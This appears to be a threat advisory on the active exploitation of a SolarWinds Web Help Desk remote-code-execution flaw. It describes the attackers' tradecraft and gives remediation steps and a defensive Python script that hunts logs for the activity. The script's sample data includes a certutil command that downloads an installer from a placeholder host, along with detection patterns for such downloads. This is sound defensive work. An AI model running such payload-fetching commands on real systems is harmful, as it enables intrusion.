Active Exploitation of SolarWinds Web Help Desk
Summary:
In early February 2026, a coordinated disclosure from Microsoft and Huntress alerted the security community to the active exploitation of CVE-2025-26399 (CVSS 9.8), a critical unauthenticated remote code execution (RCE) vulnerability in SolarWinds Web Help Desk (WHD). Microsoft’s investigation reveals that this flaw is being leveraged by a sophisticated set of threat actors to bypass previous security patches (CVE-2024-28988 and CVE-2024-28986). The exploitation is characterized by its speed; once a server is compromised, attackers move rapidly to gain persistence and conduct internal reconnaissance. Threat actors have been observed deploying a "Swiss Army Knife" of tools, including Cloudflare tunnels for stealthy command-and-control (C2), unauthorized remote management software, and credential-harvesting scripts, all aimed at pivoting from the help desk server into the broader corporate environment.
The technical attack chain typically begins with a malicious POST request to the AjaxProxy endpoint, which allows the attacker to execute arbitrary commands under the SYSTEM context. Following initial access, Microsoft observed actors utilizing Windows Background Intelligent Transfer Service (BITS) and certutil.exe to download secondary payloads, such as the Zoho ManageEngine RMM agent and Velociraptor. In some instances, attackers further obfuscated their activity by deploying QEMU virtual machines to host their C2 infrastructure or using DLL sideloading via wab.exe to dump LSASS memory. This activity coincides with the discovery of several other critical flaws in WHD (including CVE-2025-40551), which CISA recently added to its Known Exploited Vulnerabilities (KEV) catalog, signaling a widespread and sustained effort by threat actors to weaponize this platform.
Security Officer Comments:
The Microsoft data adds a layer of concern regarding the "living-off-the-land" (LotL) nature of this campaign. Attackers are not just using malware; they are abusing legitimate binaries like certutil.exe to download payloads and msiexec.exe to install unauthorized RMM tools such as Zoho Assist. This is particularly dangerous for our members who manage large, complex networks where these tools might already exist for legitimate IT support, making the malicious activity blend in with daily operations. Microsoft’s observation that attackers are targeting Active Directory (AD) immediately after gaining access suggests that the ultimate goal is full network takeover. For an IT-ISAC member, this means a single unpatched WHD instance could serve as the "patient zero" for a ransomware deployment or a massive data breach. The speed of movement, often occurring within hours of initial access, means that reactive security is insufficient; proactive hunting for these specific indicators is required.
Suggested Corrections:
- Patch and restrict exposure now. Update WHD to address CVE-2025-40551, CVE-2025-40536 and CVE-2025-26399, remove public access to admin paths, and increase logging on the AjaxProxy endpoint.
- Evict unauthorized RMM. Find and remove ManageEngine RMM artifacts (for example, ToolsIQ.exe) added after exploitation.
- Reset and isolate. Rotate credentials (start with service and admin accounts reachable from WHD), and isolate compromised hosts.
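A starting point for the proactive hunt the comments call for, as an added example that is not code from the advisory, Microsoft or Huntress: it scans constructed access-log lines for POST requests to AjaxProxy and constructed process-creation records for the living-off-the-land tradecraft named above. It assumes the WHD service runs as java.exe, that the legitimate wab.exe lives under Windows Mail, and that the AjaxProxy URL path shown is only illustrative.

```python
"""Triage hunt for the WHD post-exploitation pattern described above.
Added example, not code from the advisory or Huntress; every record is constructed."""
import re

# Constructed Tomcat-style access log; the AjaxProxy path is illustrative, not an IoC.
ACCESS_LOG = [
    '203.0.113.10 - - [03/Feb/2026:10:15:22 +0000] "POST /helpdesk/WebObjects/Helpdesk.woa/ra/AjaxProxy HTTP/1.1" 200 512',
    '198.51.100.7 - - [03/Feb/2026:10:16:05 +0000] "GET /helpdesk/WebObjects/Helpdesk.woa/ra/AjaxProxy HTTP/1.1" 200 301',
]
# Constructed process-creation records in the shape of a generic EDR/Sysmon export.
PROCESS_EVENTS = [
    {"host": "whd01", "parent": "java.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.10/a.msi a.msi"},
    {"host": "whd01", "parent": "cmd.exe", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\Public\a.msi /qn"},
    {"host": "whd01", "parent": "explorer.exe", "image": r"C:\Users\Public\wab.exe", "cmdline": "wab.exe"},
    {"host": "ws07", "parent": "explorer.exe", "image": r"C:\Program Files\Windows Mail\wab.exe", "cmdline": "wab.exe"},
    {"host": "whd01", "parent": "services.exe", "image": r"C:\ProgramData\ToolsIQ.exe", "cmdline": "ToolsIQ.exe"},
]
# Assumption: WHD's service runs as java.exe; anything it spawns deserves a look.
WHD_SERVICE_IMAGES = {"java.exe"}
ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def hunt_access_log(lines):
    """Flag POST requests to AjaxProxy, the endpoint the initial-access request hits."""
    hits = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if m and m["method"] == "POST" and "AjaxProxy" in m["path"]:
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"])})
    return hits

def hunt_process_events(events):
    """Map the LotL tradecraft named in the advisory to (host, reason) findings."""
    findings = []
    for e in events:
        name = e["image"].rsplit("\\", 1)[-1].lower()
        cmd = e["cmdline"].lower()
        if name == "certutil.exe" and ("urlcache" in cmd or "http" in cmd):
            findings.append((e["host"], "certutil.exe used as a downloader"))
        elif name == "msiexec.exe" and re.search(r"http|\\users\\|\\programdata\\", cmd):
            findings.append((e["host"], "msiexec.exe installing from a URL or user-writable path"))
        elif name == "wab.exe" and not e["image"].lower().startswith(r"c:\program files\windows mail"):
            findings.append((e["host"], "wab.exe outside Windows Mail directory (possible DLL sideloading)"))
        elif name == "toolsiq.exe":
            findings.append((e["host"], "ManageEngine RMM artifact ToolsIQ.exe"))
        if e["parent"].lower() in WHD_SERVICE_IMAGES:
            findings.append((e["host"], f"{name} spawned by the WHD service process"))
    return findings
```

Feed real exports in the same shape to both functions; the wab.exe record on ws07 shows that the legitimate binary in its normal directory is left alone.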
Link(s):
https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399